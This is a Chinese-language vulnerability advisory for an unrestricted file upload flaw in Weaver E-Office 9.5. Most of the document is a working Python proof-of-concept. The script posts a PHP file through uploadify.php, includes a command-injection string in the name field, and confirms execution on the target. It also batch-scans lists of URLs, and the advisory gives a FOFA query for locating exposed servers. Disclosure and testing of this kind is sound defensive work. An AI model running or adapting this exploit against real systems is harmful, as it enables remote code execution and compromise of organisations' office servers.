泛微 E-Office 代码问题漏洞
漏洞详情
Weaver E-Office是中国泛微科技(Weaver)公司的一个协同办公系统。 Weaver E-Office 9.5版本存在代码问题漏洞,该漏洞源于文件/inc/jquery/uploadify/uploadify.php存在问题,对参数Filedata的操作会导致不受限制的上传
影响版本
e-office 9.5
fofa
FOFA:app="泛微-EOffice"
POC:
def POC(url):
    """Check one E-Office base URL for the uploadify.php upload issue.

    Posts the hand-built multipart body in ``data`` to
    ``/inc/jquery/uploadify/uploadify.php``. If a 10-digit number appears in
    the response, the response body is used as a path segment under
    ``/attachment/`` and ``test.php`` is fetched from there; the host is
    reported as vulnerable only when that second response has status 200 and
    carries the marker ``65536``. Every outcome is reported with ``print``;
    nothing is returned.

    Args:
        url: Base URL of the target, e.g. ``http://host:port`` with no
            trailing slash (paths below are concatenated directly).

    Relies on ``requests`` and ``re`` being imported at module level, which
    is outside this excerpt.
    """
    url1 = url+'/inc/jquery/uploadify/uploadify.php'
    # Request headers; the boundary must match the one used in ``data`` below.
    headers = {
        'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundary1ZCUAAAXxnYuVIZR',
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'
    }
    # Form data (the commented-out line below is the same body, base64-encoded).
    # data = 'LS0tLS0tV2ViS2l0Rm9ybUJvdW5kYXJ5MVpDVUFBQVh4bll1VklaUg0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJuYW1lIg0KDQoxJiZjYWxjJiZjb3B5IG51bCBhLmRvYw0KLS0tLS0tV2ViS2l0Rm9ybUJvdW5kYXJ5MVpDVUFBQVh4bll1VklaUg0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJGaWxlZGF0YSI7IGZpbGVuYW1lPSJ0ZXN0LnBocCINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vbXN3b3JkDQoNCjw/cGhwIHByaW50KDI1NioyNTYpOyB1bmxpbmsoX19GSUxFX18pOz8+DQotLS0tLS1XZWJLaXRGb3JtQm91bmRhcnkxWkNVQUFBWHhuWXVWSVpSLS0'
    # Defined but never passed to requests.post/requests.get, so no proxy is used.
    proxies = {
        "http": "http://127.0.0.1:8080",
        "https": "https://127.0.0.1:8080"
    }
    data = '''------WebKitFormBoundary1ZCUAAAXxnYuVIZR
Content-Disposition: form-data; name="name"
1&&calc&© nul a.doc
------WebKitFormBoundary1ZCUAAAXxnYuVIZR
Content-Disposition: form-data; name="Filedata"; filename="test.php"
Content-Type: application/msword
<?php print(256*256); unlink(__FILE__);?>
------WebKitFormBoundary1ZCUAAAXxnYuVIZR--
'''
    try:
        response = requests.post(url1, headers=headers, data=data, timeout=2)
        # Any 10-digit run in the body is read as a sign the upload was accepted.
        match = re.search(r"\d{10}", response.text)
    except Exception as e:
        # Connection/timeout errors are reported and treated as "not matched".
        print (e)
        print ("连接失败")
        match = None
    if match != None:
        # print(response.text)
        # print (response.text)
        url2 = url + '/attachment/'+response.text+"/test.php"
        print(url2)
        try:
            resp = requests.get(url2, timeout=5)
            if resp.status_code == 200 and "65536" in resp.content:
                print(url + "vulning!!!!!!!!!!!! ")
        except Exception as e:
            print ("连接失败")
    else:
        print("漏洞不存在")
#净化URL格式为http://xxx.xxx.xxx:xxx
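def filter_url_path(url):
    """Reduce a URL to ``scheme://host[:port]``, dropping any path.

    Example: ``http://10.0.0.1:8000/login`` -> ``http://10.0.0.1:8000``.

    Args:
        url: A URL containing ``//`` after the scheme. Everything before the
            first ``//`` is kept verbatim as the scheme prefix.

    Returns:
        The scheme prefix, ``//``, and the first path segment after it (the
        host, with port if present). A string with no ``//`` is returned
        unchanged; the original raised IndexError on such input, and its
        ``else`` branch was unreachable because ``str.split`` never yields
        an empty list.

    Note: nothing in this excerpt calls this helper; ``process_file`` passes
    stripped lines straight to ``POC``.
    """
    scheme, sep, remainder = url.partition("//")
    if not sep:
        return url
    # Everything up to the next "/" is host (and port); the rest is path.
    host = remainder.split("/", 1)[0]
    return scheme + "//" + host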
#文件读取URL
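def process_file(file_path):
    """Run ``POC`` against every non-blank line of a text file of base URLs.

    Args:
        file_path: Path to a file with one base URL per line.

    Side effects: each URL is handed to ``POC``, which prints its findings.
    Blank lines are skipped so an empty line is never treated as a target
    (the original passed ``""`` through to ``POC``).
    """
    with open(file_path, "r") as file:
        for line in file:
            url = line.strip()  # drop the newline and surrounding whitespace
            if not url:
                continue
            POC(url)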
#净化URL格式为http://xxx.xxx.xxx:xxx
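def filter_url_path(url):
    """Reduce a URL to ``scheme://host[:port]``, dropping any path.

    Example: ``http://10.0.0.1:8000/login`` -> ``http://10.0.0.1:8000``.

    Args:
        url: A URL containing ``//`` after the scheme. Everything before the
            first ``//`` is kept verbatim as the scheme prefix.

    Returns:
        The scheme prefix, ``//``, and the first path segment after it (the
        host, with port if present). A string with no ``//`` is returned
        unchanged; the original raised IndexError on such input, and its
        ``else`` branch was unreachable because ``str.split`` never yields
        an empty list.

    Note: this is a second definition of the same name in the file; Python
    keeps the last binding. Nothing in this excerpt calls it.
    """
    scheme, sep, remainder = url.partition("//")
    if not sep:
        return url
    # Everything up to the next "/" is host (and port); the rest is path.
    host = remainder.split("/", 1)[0]
    return scheme + "//" + host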
#文件读取URL
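def process_file(file_path):
    """Run ``POC`` against every non-blank line of a text file of base URLs.

    This is a second definition of the same name in the file; Python keeps
    the last binding.

    Args:
        file_path: Path to a file with one base URL per line.

    Side effects: each URL is handed to ``POC``, which prints its findings.
    Blank lines are skipped so an empty line is never treated as a target
    (the original passed ``""`` through to ``POC``).
    """
    with open(file_path, "r") as file:
        for line in file:
            url = line.strip()  # drop the newline and surrounding whitespace
            if not url:
                continue
            POC(url)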
if __name__ == '__main__':
    # Script entry point: exactly one positional argument is used. A value
    # starting with "http" is treated as a single base URL; anything else is
    # treated as a path to a file of base URLs. ``sys`` is expected to be
    # imported above (outside this excerpt).
    cli_args = sys.argv[1:]
    if not cli_args:
        print("Please provide a URL or file path as an argument.")
    else:
        # Assigned but never read by POC/process_file; kept for parity.
        proxies = {
            "http": "http://127.0.0.1:8080",
            "https": "https://127.0.0.1:8080"
        }
        target = cli_args[0]
        handler = POC if target.startswith("http") else process_file
        handler(target)
修复建议
目前厂商已发布升级补丁以修复漏洞,补丁获取链接: https://service.e-office.cn/download
个人公众号及时更新最新漏洞POC,有需要的加关注